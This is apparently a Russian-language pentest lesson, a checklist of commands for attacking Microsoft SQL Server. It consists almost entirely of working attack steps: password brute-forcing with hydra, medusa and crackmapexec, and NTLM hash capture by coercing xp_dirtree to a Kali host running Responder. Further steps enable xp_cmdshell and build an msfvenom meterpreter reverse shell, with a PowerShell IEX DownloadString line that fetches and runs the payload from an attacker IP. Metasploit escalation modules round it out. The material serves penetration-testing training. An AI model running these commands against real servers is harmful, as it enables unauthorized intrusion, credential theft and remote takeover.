В этом уроке мы рассмотрим пентест Microsoft SQL Server.
Чек-лист к данному занятию:
#обучение
#AD
#pentest
#mssql
#xp_dirtree
#xp_cmdshell
#coercing
Чек-лист к данному занятию:
nmap --script ms-sql-info,ms-sql-ntlm-info -sT -sV -p 445,1433 192.168.1.3
crackmapexec mssql <IP> -d <Имя домена> -u usernames.txt -p passwords.txt
hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt <IP> mssql
medusa -h <IP> -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M mssql
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host>
msf> use auxiliary/scanner/mssql/mssql_login
mssqlclient.py -windows-auth <DOMAIN>/<user>:<password>@<IP>
sql> select IS_SRVROLEMEMBER ('sysadmin');
sql> SELECT * FROM fn_my_permissions(NULL, 'SERVER');
msf> use auxiliary/admin/mssql/mssql_enum
msf> use admin/mssql/mssql_enum_sql_logins
responder -I eth0 -v
sql> use master; exec xp_dirtree '\\<KALI_IP>\share';--
john --wordlist=/usr/share/wordlists/rockyou.txt mssql-svc.hash
sql> SELECT CONVERT(INT, ISNULL(value, value_in_use)) AS config_value FROM sys.configurations WHERE name = 'xp_cmdshell';
sql> EXEC sp_configure 'show advanced options',1;
sql> RECONFIGURE;
sql> EXEC sp_configure 'xp_cmdshell',1;
sql> RECONFIGURE;
sql> xp_cmdshell "echo (Get-Service windefend).Status | powershell"
sql> xp_cmdshell "echo Get-MpComputerStatus | powershell -noprofile"
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=4444 VERBOSE=true -f psh -o meterpreter.ps1
sql> EXEC xp_cmdshell 'powershell.exe -ExecutionPolicy Bypass -Command "IEX(New-Object Net.WebClient).DownloadString(''[http://192.168.1.5:80/meterpreter.ps1](http://192.168.1.5/meterpreter.ps1)'')"'
msf> use exploit/windows/mssql/mssql_payload
msf> set payload windows/x64/meterpreter/reverse_tcp
msf> use exploit/windows/mssql/mssql_linkcrawler
msf> use admin/mssql/mssql_escalate_execute_as
msf> use admin/mssql/mssql_escalate_dbowner
msf> use windows/manage/mssql_local_auth_bypass
#обучение
#AD
#pentest
#mssql
#xp_dirtree
#xp_cmdshell
#coercing